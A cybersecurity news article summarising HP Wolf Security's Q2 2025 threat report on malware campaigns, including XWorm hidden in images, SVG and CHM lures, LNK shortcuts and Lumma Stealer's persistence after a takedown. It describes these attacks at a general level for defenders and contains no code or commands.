New Techniques, Old File Types: Attackers Use Common Files as Weapons
Attackers are coming up with new strategies to mix in with standard business tools Old File Types, concealing their actions within procedures and formats that employees and IT teams frequently rely on. According to HP Wolf Security’s most recent quarterly Threat Insights Report, attackers are constantly evolving, making it more difficult for defenses to stay ahead.
Living off the land to stay hidden
The XWorm remote access trojan was one of the most prominent campaigns seen in the second quarter of 2025. Several built-in Windows programs were strung together by the attackers rather than depending just on proprietary malware. They were able to run commands, copy files, and decode secret payloads with these so-called “living off the land” binaries without setting off as many alarms.
XWorm configuration (Source: HP Wolf Security)
The final XWorm payload was hidden within the pixels of a genuine picture that was downloaded from a reliable source. After the hidden data was extracted via PowerShell scripts, the malware was executed by Microsoft’s MSBuild tool. By the time the infection was finished, most of the work was done by programs that were already installed on the machine, giving the attackers remote access and the opportunity to steal data.
For security teams, living off the land practices are famously challenging since it can be challenging to distinguish between green and red indicators, or attacks and genuine activity. You have to decide whether to close off activity and cause problems for users and SOC tickets or to leave it open and run the danger of an attacker getting through. According to Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., “defense-in-depth with containment and isolation is essential to trap attacks before they can cause harm,” since even the finest detection will miss some threats.
Invoices and fake documents still work
Phishing emails remain the dominant delivery method, accounting for 61% of threats that reached endpoints. Attackers continue to refine how they use document formats as lures.
One campaign used realistic invoice-themed emails to trick recipients into opening SVG attachments. The attachments displayed a convincing imitation of Adobe Acrobat, complete with animations and progress bars, before prompting users to download malware. The script that followed was a lightweight reverse shell, providing attackers with command execution and data collection.
The use of PDF attachments that showed hazy bills with a download button was used in another round of phishing. A malicious Visual Basic encoded script concealed in a ZIP file was accessed using that link. To make detection even more challenging, the script placed important components of the infection directly in the Windows Registry. MassLogger, a credential stealer that could record keystrokes and browser information, was the last payload. Attackers occasionally used ModiRAT, a secondary remote access trojan, if the victim was in France.
Old File Types Resurface
Attackers repurpose formats that many users hardly ever see these days, according to the report. Once utilized for Windows application manuals, compiled HTML Help files are now being exploited as a weapon to spread malware. These files are containers for multi-stage infestations since they allow scripting. Opening a help file masquerading as project documentation in campaigns that were observed set off scripts that ultimately resulted in XWorm infections.
LNKs, or shortcut files, also returned. In one instance, they were sent by phishing email disguised as PDFs enclosed in a ZIP file. The shortcut installed the Remcos remote access trojan by executing malicious code rather than opening a document. To further reduce the likelihood that users or tools would detect the final payload, the attackers concealed it inside an outdated Program Information File format.
Lumma Stealer survives takedown
Some operators have not been deterred even by law enforcement efforts. In May 2025, Lumma Stealer was disrupted by an international takedown that took control of a large portion of its infrastructure. However, in June, operations to distribute it persisted, with attackers switching to new servers and techniques.
IMG files included in phishing emails were part of one distribution chain. Windows viewed these archives as virtual disks when they were opened, displaying an HTML application file to users that looked like an invoice. In the end, this resulted in the execution of obfuscated PowerShell code that circumvented disk-based detection by unpacking and launching Lumma Stealer in memory.
Threat delivery trends
In Q2 2025, archives accounted for 40% of the threats reported, making them the most popular delivery channel. Executables and scripts came in second at 35%. Word, Excel, and PDF were among the lesser but equally important document types.
The results demonstrate how attackers keep switching between file types, selecting the ones that have the best chance of getting to users undetected. Present-day campaigns are giving fresh life to even earlier formats, such as PIF executables and .chm help files.
What does this mean for defenders?
According to the research, attackers are making an attempt to pass for legitimate activity. They lessen the likelihood of being discovered early by employing realistic lures, relying on built-in system utilities, and concealing malware inside reliable file types.
This requires defenders to look beyond simple filtering and file signatures. The importance of behavior-based detection strategies, persistence tactics, and system tool misuse is growing.
The operations discussed here demonstrate that attackers can use common technologies and file types to transform them into weapons without the need for sophisticated malware.
“Attackers are improving their methods rather than creating new ones. Although phishing, reverse shelling, and living off the land have been used for decades, modern threat actors are honing these techniques. Living-off-the-land tools are increasingly being chained together, and less evident file types—like images—are being used to avoid detection. Consider reverse shells as one example. A straightforward, lightweight script can accomplish the same goal as a fully functional RAT. It’s quick, easy, and frequently goes unnoticed due to its simplicity,” said Alex Holland, Principal Threat Researcher at HP Security Lab.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.
Read More:
Cyberattack on JLR Servers Forces Continued Production Halt
About Author
English